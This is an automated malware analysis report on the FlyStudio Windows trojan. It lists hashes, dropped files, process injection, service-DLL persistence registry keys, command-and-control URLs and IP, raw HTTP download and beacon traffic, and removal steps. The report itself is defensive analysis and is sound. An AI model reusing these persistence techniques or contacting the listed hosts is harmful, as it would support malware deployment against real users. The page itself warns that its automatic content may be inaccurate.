Trojan.Win32.FlyStudio_3dd12f58ca

by malwarelabrobot on July 26th, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6183 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), Trojan-FNDE!3DD12F58CA3C (McAfee), Trojan.Gen (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08NC0PGC17 (TrendMicro), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Malware


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 3dd12f58ca3c7a70343e038f04558ea6
SHA1: e093417060a56e3ed897b40af7dd3e24d21108c6
SHA256: 71b7133a780ba81f26681b76d9f6b414f47789c6e256a7ed3da1e1e169422bbb
SSDeep: 6144:MHPJ417Frt OOLt2n75z0PGaogLfSaAONTKJmwObfC:2PmDqL8n75zYGWr9nTjfC
Size: 340496 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-06 07:29:59
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:4032

The Trojan injects its code into the following process(es):

tip.exe:3908

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:4032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (12669 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (9060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\report[1].txt (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\ip[1] (71 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\dll_service[1].bin (61717 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\tip[1].bin (48705 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\report[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\ip[1] (0 bytes)

Registry activity

The process %original file name%.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "E0 BE 6B 5B 65 05 D3 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdsServiceGroup" = "AdsService"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "E0 BE 6B 5B 65 05 D3 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\System\CurrentControlSet\services\AdsService]
"Description" = "AdsService"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\System\CurrentControlSet\services\AdsService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tip.exe:3908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@D2B9.tmp,"

Dropped PE files

MD5 File path
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\tip[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@D2B9.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 241331 241664 4.55836 28d93a4866fee5e9c04a67655040d2ed
.rdata 245760 77038 77312 3.73342 3ed56b57cc626764796f03bdab466f39
.data 323584 9556 6144 2.76591 f2a1c0bf0a7b50b83d143a7502cd2aa5
.tls 335872 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 339968 488 512 3.30333 84e66ff2e405d01acdebe7444e41161c
.reloc 344064 12820 13312 4.49439 21abc5d2a6af9a076e50bf1671f700e0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 34

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/ip
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/send 108.61.212.148
teredo.ipv6.microsoft.com 157.56.120.207
api.knsdknknndnfjenkjwwlekfj.com 108.61.212.148
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 25 Jul 2017 06:54:09 GMT
Accept-Ranges: bytes
ETag: "461abfd0125d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 25 Jul 2017 16:45:00 GMT
Content-Length: 974336

<<< skipped >>>

GET /tip.bin HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 25 Jul 2017 16:45:06 GMT
Content-Length: 304640

<<< skipped >>>

GET /api/report HTTP/1.1
Server: TfMEeov7vdA7nOAqmd6mZmvXjVjd87jd3m8oD7gO2mRb3mebZmcoZSFS6O2EA76oRq0qZmJSjdcO4STSjVFq6mcqMEeoT7eOcfDbbORXzS8XDf4ojfcfMEJmpS7VXoFmE74mRqZXPSREGE4q0qFq4qPSFETSEdvS77REjqFXvEFmebGq4qHbrVGX4S4X4bCo6mHm8XeVDd3dME3SMEQ7s7nOjf4oefwdgqGbpmJ7wb2S8XTd
Server-Key: bmESqXrCo7VfOdalIB1xiL5tQhuKUY9NMpD6gyA8cjsknHPzv4FZR2eGw3TJ0W
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: 76peoPhXCFijbgnmRLyIqxOvDM1uYlB3dk9wTr0aQ2EzWH5ZsJ8StNV4KfUcGA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 25 Jul 2017 16:45:00 GMT
[DATA]76peoPhXCFijbgnmRLyIqxOvDM1uYlBwiHiQitigiHijiHi8iHijiHispHiQitij
iti8pHi8iHiSiHiIiHispHi4ptiQitiRiHispHiIiHiIiHi8iHiriHispHiQitijitiQit
ieiHi0iHiKiHiSiHibiHi4iHi8iHijiHispHicptieiHi8iHijiHi8iHiQiti2iAi3dk9w
Tr0aQ2EzWH5ZsJ8StNV4KfUcGA[DATA]



GET /api/ip HTTP/1.1

User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 25 Jul 2017 16:45:11 GMT
Content-Length: 71
{"ip":"194.242.96.226","iso_code":"UA","en":"Ukraine","cn":"........."
}


The Trojan connects to the servers at the following location(s):



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:4032

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (12669 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (9060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\report[1].txt (242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\ip[1] (71 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\dll_service[1].bin (61717 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\tip[1].bin (48705 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
